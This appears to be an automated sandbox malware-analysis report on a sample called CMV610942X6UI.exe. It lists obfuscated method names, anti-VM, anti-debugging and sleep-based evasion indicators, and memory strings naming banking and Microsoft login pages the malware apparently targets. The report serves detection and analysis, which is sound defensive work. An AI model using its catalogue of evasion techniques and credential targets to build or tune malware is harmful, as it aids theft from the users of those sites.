Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, QZC8Vgm38RMQqTFC0I.cs High entropy of concatenated method names: 'bhmpgxJDGX', 'Xh4pyFtcDj', 'y21pjWtxlD', 'HYojFb6fNN', 'WuxjzQLAnC', 'W0GpIYHvdA', 'g0lpPYtufT', 'IHgp04Ilk4', 'hKnptSWk86', 'NKipHVr3VA'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, wdwmQsS8tMhsauNIkb.cs High entropy of concatenated method names: 'G95jNHp6AC', 'ba9jLHZdOE', 'oV2jQqAGbs', 'ToString', 'prxj42nL5m', 'UKijXPoV8I', 's6E13wHgNWLacbRiBMF', 'KW3pASHRAeoV0c7nTk7', 'LGZm2LHrwsAitZOuTHS'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, xx0KhNYstrI8TI7Bnr.cs High entropy of concatenated method names: 'xl9t7BWZbQ', 'OCntg7F8PP', 'bCetKYilTO', 'moLtyXvmHq', 'ksJtWEvQn2', 'zW4tju3PFq', 'PGJtptW8lv', 'LyFtYN90u8', 'eYbtdeU5aG', 'xjxtwEepRp'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, QuvsOJLMp63DVZBfMB.cs High entropy of concatenated method names: 'NwnZwpPMui', 'JTCZ5H8J82', 'ToString', 'sGQZgZFC1Y', 'pH2ZKAFd5S', 'UG5ZymWfps', 'sRuZWNZtMD', 'SpEZjExbm4', 'IfqZpJXPCI', 'CWcZYD0ned'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, tHT8CVGRGX12Uy9q6l.cs High entropy of concatenated method names: 's09psEwZlS', 'URvphnah8v', 'SBkpaplUjE', 'e8ypbTCLkr', 'a8apO1cG7o', 'JZ4pJchb7m', 'tgHpCCnbwn', 'eI0p3aSH1T', 'Ve9pAwDOwS', 'HPypTbanWk'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, wjHVApHL5aYoBPGjHD.cs High entropy of concatenated method names: 'fHePpqar9C', 'HDVPYsyoPk', 'lODPw5LB2H', 'ynwP5unZA6', 'LkrPkFev9L', 'XndPrhBdq7', 'gTXwBKelHZ2HvdsqKA', 'CKTjfYIo4ovXGutMZA', 'dvdPPNdl7Y', 'XnjPtsI8c3'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, bPa2QExW5ojMAKvEve.cs High entropy of concatenated method names: 'e4tkUPc7hT', 'Wjekv9bNGd', 'SlEkxqIP9L', 'X3Ak2k0O5M', 'L2okijtBxa', 'Ei9k6jPSdW', 'FQAkl0h8lX', 'zSyk9bDerL', 'FP3kSE8uhR', 'zXUkmxgj1W'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, BxUmT6KabXkxnurDhm.cs High entropy of concatenated method names: 'Dispose', 'd7PPRwZyDk', 'uGy0iZ0fmT', 'AhuUUYKuvY', 'qPcPF8Uw5t', 'hUyPzgwOd2', 'ProcessDialogKey', 'zBw0IFb9wA', 'lNw0PaJe5w', 'eZV00mC84m'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, qLhyZwAOD5LB2Hhnwu.cs High entropy of concatenated method names: 'ujZybAxNEp', 'ma5yJ6WhjV', 'Gwmy3QPjpy', 'sxRyAoNsfY', 'jMTykZFWl9', 'sQKyr6yF4o', 'f4tyZM51d5', 'G0EyulQJnu', 'wX2yEh12jR', 'N9CyoGrih8'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, uqar9C3iDVsyoPkaSq.cs High entropy of concatenated method names: 'viTKxn3xju', 'piHK2h12rx', 'MBIKN36Sfu', 'IY0KLthUvV', 'jDnKQ5AW0d', 'pmYK4ekwnT', 'qVEKXeakwi', 'Ry8KfNfZL6', 'Cp2KRIro1Z', 'DhFKFb160r'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, tojMPAPIFWIQ7h6ZKOd.cs High entropy of concatenated method names: 'HZBEswU9aU', 'pvQEh3UPfc', 'oa2EamMZ1q', 'yn1EbOlt4r', 'DG8EOC9At4', 'rJlEJCMO22', 'uZ9ECYxPlL', 'bnbE3SnylG', 'miUEA5nO5B', 'yPaETdulDk'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, t5ATJRPtXI2sMd8MoI7.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VINoxpC6CR', 'd49o29oiVL', 'SEPoNulq1G', 'zRUoLyMV35', 'IZIoQGuQmr', 'ueno4pKYtA', 'zYToX62Byx'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, bc8Uw5ftWUygwOd2hB.cs High entropy of concatenated method names: 'XeGugm0gT1', 'lLhuKRAkxc', 'e58uy23GDM', 'C47uWsdjQ5', 'jsnujRw751', 'NWHupgHEmh', 'Ht3uYEXyYG', 'yujudWwqWp', 'A7euwER0Mn', 'op2u5HbAMQ'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, pgN0ik0xr8ZdYvmMlB.cs High entropy of concatenated method names: 'LsQanhhR2', 'l8IbJk5Es', 'YrbJGX66K', 'ryJCipret', 'L19AtiD4O', 'z5nTcCpS9', 'Sq8pt8T6T2Q7AyTqpl', 'UvchEkiENYb7URxVs4', 'o99u3S3N6', 'EVeo6sVUm'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, vZA6ivT8rHvUbMkrFe.cs High entropy of concatenated method names: 'jFAWOJgi1P', 'rb4WCv32AV', 'qVly6L9oKi', 'FKUylXfPH9', 'siOy9UiZmd', 'JDjySqWoIi', 'hxyymr2RVH', 'HSwyMwABGA', 'bZdyGPcyHK', 'mspyUpsrfg'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, zpnUutyO1DyuGC9q5s.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jU70RxsGr6', 'JMk0FH9vIp', 'kAP0z1Bbhs', 'TYntIlb6hC', 'QiptPeGmQN', 'I82t0DbBLk', 'PjXttcGIZP', 'NYqw032oTYOkrC3y4Ts'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, cV3u6S4Dgqd6WRDw3L.cs High entropy of concatenated method names: 'LD6ZfdhYFc', 'o6lZF2oVeI', 'C8xuIHXQA4', 'tnOuPKVvab', 'Ef9Z1keglY', 'ifwZvDfWlP', 'cEfZBfjm8T', 'C0UZx8TQZt', 'RcPZ2iAtgF', 'PgUZNXwWJ6'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, P9LRnd8hBdq7ZDX3Nv.cs High entropy of concatenated method names: 'UMBj7GaFBB', 'pVSjKuh2Bj', 'f9rjW9kwX2', 'Gj0jpsKPO3', 'fqVjYfNyBU', 'O4QWQRVshS', 'BnXW4epvuu', 'oauWXQIKRM', 'eLCWfRhYZs', 'HYMWRm9E5o'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, DloH6yB4mxp36pGqUr.cs High entropy of concatenated method names: 'N12D3VqyAR', 'pUUDAEIntj', 'ihRD8ImQef', 'xVYDiQiy7s', 'F4fDlIIT5O', 'CN5D9EGbQQ', 'I83Dm5uwxH', 'm04DMlvmEq', 'lCUDUhhWRB', 'fxCD1G304G'
Source: 0.2.CMV610942X6UI.exe.46e39a0.3.raw.unpack, LC84mQFdFur2ZUv2lS.cs High entropy of concatenated method names: 'BOuEP8EQYO', 'eNeEt05trw', 'sd2EHWrZGI', 'LRLEgfu66q', 'OSbEKYnSuu', 'H2xEWo6cKi', 'GsZEj9McMD', 'GUfuXTdMvB', 'HXnufpMTUF', 'skauRHNtlE'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, mFb9wARwNwaJe5w7ZV.cs High entropy of concatenated method names: 'zqCu8q5y6W', 'TULuiJGNsW', 'N08u67Rpjw', 'EcMullE9Vf', 'kJDux53Qo0', 'Tivu94lSr3', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, QZC8Vgm38RMQqTFC0I.cs High entropy of concatenated method names: 'bhmpgxJDGX', 'Xh4pyFtcDj', 'y21pjWtxlD', 'HYojFb6fNN', 'WuxjzQLAnC', 'W0GpIYHvdA', 'g0lpPYtufT', 'IHgp04Ilk4', 'hKnptSWk86', 'NKipHVr3VA'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, wdwmQsS8tMhsauNIkb.cs High entropy of concatenated method names: 'G95jNHp6AC', 'ba9jLHZdOE', 'oV2jQqAGbs', 'ToString', 'prxj42nL5m', 'UKijXPoV8I', 's6E13wHgNWLacbRiBMF', 'KW3pASHRAeoV0c7nTk7', 'LGZm2LHrwsAitZOuTHS'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, xx0KhNYstrI8TI7Bnr.cs High entropy of concatenated method names: 'xl9t7BWZbQ', 'OCntg7F8PP', 'bCetKYilTO', 'moLtyXvmHq', 'ksJtWEvQn2', 'zW4tju3PFq', 'PGJtptW8lv', 'LyFtYN90u8', 'eYbtdeU5aG', 'xjxtwEepRp'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, QuvsOJLMp63DVZBfMB.cs High entropy of concatenated method names: 'NwnZwpPMui', 'JTCZ5H8J82', 'ToString', 'sGQZgZFC1Y', 'pH2ZKAFd5S', 'UG5ZymWfps', 'sRuZWNZtMD', 'SpEZjExbm4', 'IfqZpJXPCI', 'CWcZYD0ned'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, tHT8CVGRGX12Uy9q6l.cs High entropy of concatenated method names: 's09psEwZlS', 'URvphnah8v', 'SBkpaplUjE', 'e8ypbTCLkr', 'a8apO1cG7o', 'JZ4pJchb7m', 'tgHpCCnbwn', 'eI0p3aSH1T', 'Ve9pAwDOwS', 'HPypTbanWk'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, wjHVApHL5aYoBPGjHD.cs High entropy of concatenated method names: 'fHePpqar9C', 'HDVPYsyoPk', 'lODPw5LB2H', 'ynwP5unZA6', 'LkrPkFev9L', 'XndPrhBdq7', 'gTXwBKelHZ2HvdsqKA', 'CKTjfYIo4ovXGutMZA', 'dvdPPNdl7Y', 'XnjPtsI8c3'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, bPa2QExW5ojMAKvEve.cs High entropy of concatenated method names: 'e4tkUPc7hT', 'Wjekv9bNGd', 'SlEkxqIP9L', 'X3Ak2k0O5M', 'L2okijtBxa', 'Ei9k6jPSdW', 'FQAkl0h8lX', 'zSyk9bDerL', 'FP3kSE8uhR', 'zXUkmxgj1W'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, BxUmT6KabXkxnurDhm.cs High entropy of concatenated method names: 'Dispose', 'd7PPRwZyDk', 'uGy0iZ0fmT', 'AhuUUYKuvY', 'qPcPF8Uw5t', 'hUyPzgwOd2', 'ProcessDialogKey', 'zBw0IFb9wA', 'lNw0PaJe5w', 'eZV00mC84m'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, qLhyZwAOD5LB2Hhnwu.cs High entropy of concatenated method names: 'ujZybAxNEp', 'ma5yJ6WhjV', 'Gwmy3QPjpy', 'sxRyAoNsfY', 'jMTykZFWl9', 'sQKyr6yF4o', 'f4tyZM51d5', 'G0EyulQJnu', 'wX2yEh12jR', 'N9CyoGrih8'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, uqar9C3iDVsyoPkaSq.cs High entropy of concatenated method names: 'viTKxn3xju', 'piHK2h12rx', 'MBIKN36Sfu', 'IY0KLthUvV', 'jDnKQ5AW0d', 'pmYK4ekwnT', 'qVEKXeakwi', 'Ry8KfNfZL6', 'Cp2KRIro1Z', 'DhFKFb160r'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, tojMPAPIFWIQ7h6ZKOd.cs High entropy of concatenated method names: 'HZBEswU9aU', 'pvQEh3UPfc', 'oa2EamMZ1q', 'yn1EbOlt4r', 'DG8EOC9At4', 'rJlEJCMO22', 'uZ9ECYxPlL', 'bnbE3SnylG', 'miUEA5nO5B', 'yPaETdulDk'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, t5ATJRPtXI2sMd8MoI7.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VINoxpC6CR', 'd49o29oiVL', 'SEPoNulq1G', 'zRUoLyMV35', 'IZIoQGuQmr', 'ueno4pKYtA', 'zYToX62Byx'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, bc8Uw5ftWUygwOd2hB.cs High entropy of concatenated method names: 'XeGugm0gT1', 'lLhuKRAkxc', 'e58uy23GDM', 'C47uWsdjQ5', 'jsnujRw751', 'NWHupgHEmh', 'Ht3uYEXyYG', 'yujudWwqWp', 'A7euwER0Mn', 'op2u5HbAMQ'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, pgN0ik0xr8ZdYvmMlB.cs High entropy of concatenated method names: 'LsQanhhR2', 'l8IbJk5Es', 'YrbJGX66K', 'ryJCipret', 'L19AtiD4O', 'z5nTcCpS9', 'Sq8pt8T6T2Q7AyTqpl', 'UvchEkiENYb7URxVs4', 'o99u3S3N6', 'EVeo6sVUm'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, vZA6ivT8rHvUbMkrFe.cs High entropy of concatenated method names: 'jFAWOJgi1P', 'rb4WCv32AV', 'qVly6L9oKi', 'FKUylXfPH9', 'siOy9UiZmd', 'JDjySqWoIi', 'hxyymr2RVH', 'HSwyMwABGA', 'bZdyGPcyHK', 'mspyUpsrfg'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, zpnUutyO1DyuGC9q5s.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jU70RxsGr6', 'JMk0FH9vIp', 'kAP0z1Bbhs', 'TYntIlb6hC', 'QiptPeGmQN', 'I82t0DbBLk', 'PjXttcGIZP', 'NYqw032oTYOkrC3y4Ts'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, cV3u6S4Dgqd6WRDw3L.cs High entropy of concatenated method names: 'LD6ZfdhYFc', 'o6lZF2oVeI', 'C8xuIHXQA4', 'tnOuPKVvab', 'Ef9Z1keglY', 'ifwZvDfWlP', 'cEfZBfjm8T', 'C0UZx8TQZt', 'RcPZ2iAtgF', 'PgUZNXwWJ6'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, P9LRnd8hBdq7ZDX3Nv.cs High entropy of concatenated method names: 'UMBj7GaFBB', 'pVSjKuh2Bj', 'f9rjW9kwX2', 'Gj0jpsKPO3', 'fqVjYfNyBU', 'O4QWQRVshS', 'BnXW4epvuu', 'oauWXQIKRM', 'eLCWfRhYZs', 'HYMWRm9E5o'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, DloH6yB4mxp36pGqUr.cs High entropy of concatenated method names: 'N12D3VqyAR', 'pUUDAEIntj', 'ihRD8ImQef', 'xVYDiQiy7s', 'F4fDlIIT5O', 'CN5D9EGbQQ', 'I83Dm5uwxH', 'm04DMlvmEq', 'lCUDUhhWRB', 'fxCD1G304G'
Source: 0.2.CMV610942X6UI.exe.47a67c0.2.raw.unpack, LC84mQFdFur2ZUv2lS.cs High entropy of concatenated method names: 'BOuEP8EQYO', 'eNeEt05trw', 'sd2EHWrZGI', 'LRLEgfu66q', 'OSbEKYnSuu', 'H2xEWo6cKi', 'GsZEj9McMD', 'GUfuXTdMvB', 'HXnufpMTUF', 'skauRHNtlE'
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: CMV610942X6UI.exe PID: 7812, type: MEMORYSTR
Switches to a custom stack to bypass stack traces
Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFBCB7ADA44
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: C50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: 29E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: 27B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: 7B60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: 7010000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: 8B60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: 9B60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: 9ED0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: AED0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: BED0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: D220000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: E220000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: F220000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Memory allocated: F900000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB096E rdtsc 3_2_00FB096E
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\systray.exe Window / User API: threadDelayed 9844 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\CMV610942X6UI.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\systray.exe API coverage: 2.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\CMV610942X6UI.exe TID: 7832 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 5364 Thread sleep count: 128 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 5364 Thread sleep time: -256000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 5364 Thread sleep count: 9844 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 5364 Thread sleep time: -19688000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe TID: 4868 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe TID: 4868 Thread sleep time: -34500s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe Code function: 8_2_0324B7F0 FindFirstFileW,FindNextFileW,FindClose, 8_2_0324B7F0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: 382-I9W6.8.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 382-I9W6.8.dr Binary or memory string: discord.comVMware20,11696494690f
Source: 382-I9W6.8.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: 382-I9W6.8.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 382-I9W6.8.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 382-I9W6.8.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 382-I9W6.8.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 382-I9W6.8.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 382-I9W6.8.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 382-I9W6.8.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 382-I9W6.8.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 382-I9W6.8.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 382-I9W6.8.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 382-I9W6.8.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 382-I9W6.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: systray.exe, 00000008.00000002.3260476733.0000000003492000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 382-I9W6.8.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: ZkqZZBQxQqm.exe, 00000009.00000002.3261162514.0000000001159000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 382-I9W6.8.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 382-I9W6.8.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 382-I9W6.8.dr Binary or memory string: tasks.office.comVMware20,11696494690o
Source: firefox.exe, 0000000C.00000002.2077716909.00000150A130C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: 382-I9W6.8.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 382-I9W6.8.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 382-I9W6.8.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 382-I9W6.8.dr Binary or memory string: global block list test formVMware20,11696494690
Source: 382-I9W6.8.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 382-I9W6.8.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 382-I9W6.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 382-I9W6.8.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 382-I9W6.8.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 382-I9W6.8.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 382-I9W6.8.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 382-I9W6.8.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB096E rdtsc 3_2_00FB096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00417193 LdrLoadDll, 3_2_00417193
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00F6C0F0 mov eax, dword ptr fs:[00000030h] 3_2_00F6C0F0
Source: C:\Users\user\Desktop\CMV610942X6UI.exe Code function: 3_2_00FB20F0 mov ecx, dword ptr fs:[00000030h] 3_2_00FB20F0
